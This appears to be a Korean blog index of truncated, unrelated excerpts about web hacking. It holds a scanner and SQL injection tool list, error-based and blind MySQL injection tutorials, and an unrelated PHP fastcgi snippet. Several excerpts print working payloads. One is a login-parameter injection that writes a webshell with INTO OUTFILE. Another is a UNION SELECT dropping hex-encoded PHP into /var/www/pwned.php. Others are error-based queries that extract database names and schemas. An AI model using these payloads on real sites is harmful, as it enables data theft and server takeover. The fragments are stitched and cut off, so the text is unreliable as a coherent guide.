출처 : http://www.webhackingexposed.com/tools.html Free Web Security Scanning Tools Nikto N-Stalker NStealth Free Edition Burp Suite Paros Proxy OWASP WebscarabSQL Injection SQL Power Injector by Francois Larouche Bobcat (based on "Data Thief" by Application Security, Inc.). Absinthe - free blind SQL injection tool SQLInjector by David Litchfield NGS Software database tools Cross-Site Scripting (X..
Methods of Quick Exploitation of Blind SQL Injection # Title: Methods of quick exploitation of blind SQL Injection # Date: January 25th, 2010 # Author: Dmitry Evteev (Positive Technologies Research Lab) # Contacts: http://devteev.blogspot.com/ (Russian); http://www.ptsecurity.com/ In this paper, the quickest methods of Blind SQL Injection (error-based) exploitation are collected and considered b..
출처 :http://blog.hacktalk.net/mysql-error-based-injection/ ————————————————- Mysql Error Based injection ————————————————- Author : Keith (k3170) Makan Requirements: >A Brain >A browser >Basic SQL (poke around the internet for an SQL manual, it should’nt take long to learn) First off, lets make sure you guys know what Error Based SQL injection is and where you can find some good examples to train..
This article will be about into outfile, a pretty useful feature of MySQL for SQLi attackers. We will take a look at the FILE privilege and the web directory problem first and then think about some useful files we could write on the webserver. Please note that attacking websites you are not allowed to attack is a crime and should not be done. This article is for learning purposes only. As in the..
http 에러 메시지를 통해 절대경로를 취득 후 webshell upload http://test.com/login/login.php?user_id=admin';select '' INTO OUTFILE 'C:/APM_Setup/htdocs/abc.php';#user_pw=1234!@#$ webshell 실행 화면 UNION 구문을 이용한 방법 select ... where id=30 and 1=0 union select 0x[PHP source hex encoded] into outfile ('/var/www/pwned.php') ※ 공격 성공을 위한 조건 mysql's user has rights of writing files. linux's user "mysql" has right +w on /var..
출처 : http://hellsonic.tistory.com/entry/Error-Based-MYSQL-InjectionError Based MYSQL Injection mysql> select 1 from dual where 1=1 and row(1,1)>(select count(*),concat(version(),floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1);ERROR 1062 (23000): Duplicate entry '5.1.41-community1' for key 'group_key' mysql> select 1 from dual where 1=1 and ExtractValue(1,c..
db querycurrent db_name+and(select 1 FROM(select count(*),concat((select (select concat(database())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) number of dps+and(select 1 FROM(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,count(schema_name),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) FROM inform..
Make sure php support fastcgiType any one of the following command to verify that php support fastcgi $ php -vOutput:PHP 5.0.4 (cli) (built: Nov 8 2005 08:27:12) Copyright (c) 1997-2004 The PHP Group Zend Engine v2.0.4-dev, Copyright (c) 1998-2004 Zend TechnologiesOR $ php-cgi -v Output:PHP 5.0.4 (cgi-fcgi) (built: Nov 8 2005 08:25:54) Copyright (c) 1997-2004 The PHP Group Zend Engine v2.0.4-dev..
